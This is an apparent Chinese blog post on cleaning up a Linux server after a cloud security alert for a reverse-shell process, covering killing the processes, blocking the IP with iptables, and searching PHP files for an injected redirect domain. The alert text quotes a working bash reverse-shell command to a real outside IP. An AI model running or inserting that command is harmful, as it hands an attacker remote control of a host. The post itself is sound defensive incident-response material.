阿里云9.9元云服务器限时购买

进程异常行为-反弹Shell攻击,KILL多个进程

进程异常行为-反弹Shell攻击
父进程名称:bash
进程名称:bash
进程名称:/usr/bin/bash
进程id:23,077
命令行参数:sh -c /bin/bash -i >& /dev/tcp/27.255.72.119/4451 0>&1
说明:黑客利用远程代码执行漏洞或者恶意木马向中控服务器建立反向TCP连接,连接建立后,黑客可利用该连接远程执行任意系统指令,严重危害主机安全。
解决方案:建议立即KILL该可疑反弹SHELL进程,并及时清理计划任务中的恶意代码。
看下27.255.72.119是什么鬼?
 
 
这个IP全是邪恶文件。

首先,用ps查看进程,方法如下:

ps -ef

  

N多反弹SHELL进程需要清理。

下面利用循环kill掉进程。

ps命令将某个进程显示出来  grep命令是查找  中间的|是管道命令 是指ps命令与grep同时执行  PS是LINUX下最常用的也是非常强大的进程查看命令  grep命令是查找,是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。awk '{print $2}'  $fileName :   一行一行的读取指定的文件, 以空格作为分隔符,打印第二个字段。while read line的 循环中的重定向,done写在最后相当于给整个while do 语句加了一个约束条件,读取每行至文件尾。

 ps -ef | grep 27.255.72.119| awk '{print $2}'| while read line;do kill $line;done

 kill 结束不掉的时候,可以加 -9,强制

kill -9 28271

查看iptables规则,包括所有的链。filter表包含INPUT、OUTPUT、FORWARD三个规则链。  说明:-L是--list的简写,作用是列出规则。

iptables -L

 使用 iptables屏蔽IP段

iptables -A OUTPUT -d  27.255.72.119 -j DROP

 

#添加屏蔽IP 
#禁止此IP访问服务器 iptables -I INPUT -s 1.2.3.4 -j DROP 或 iptables -A INPUT -s 1.2.3.4 -j DROP 
#禁止服务器访问此IP iptables -A OUTPUT -d 1.2.3.4 -j DROP 如果要封某个网段: iptables -I INPUT -s 1.2.3.0/24 -j DROP  
#清空屏蔽IP iptables -t filter -D INPUT -s 1.2.3.4 -j DROP iptables -t filter -D OUTPUT -d 1.2.3.4 -j DROP  
#一键清空所有规则 iptables -F  
#查看 iptables -L INPUT 或 iptables -L 或 iptables-save(此命令将保存规则,下次开机自动执行) 

 

Netstat 是一款命令行工具,可用于列出系统上所有的网络套接字连接情况,包括 tcp, udp 以及 unix 套接字,另外它还能列出处于监听状态(即等待接入请求)的套接字。

netstat -tnpla| grep ESTABLISHED| grep root

cat /etc/rc.local

百度打开主网站被跳转链接了6he5566.com还弹出个QQ框,what?

find . -name "*.php" -exec grep -i  "6he5566.com" {} \;

删除这些文件,修改相应配置conf文件,修改文件目录权限,修复代码漏洞。

posted @ 2019-06-28 17:12  HIIT  阅读(1562)  评论(0编辑  收藏  举报
阿里云限时红包 最高 ¥ 2000 云产品通用红包,可叠加官网常规优惠使用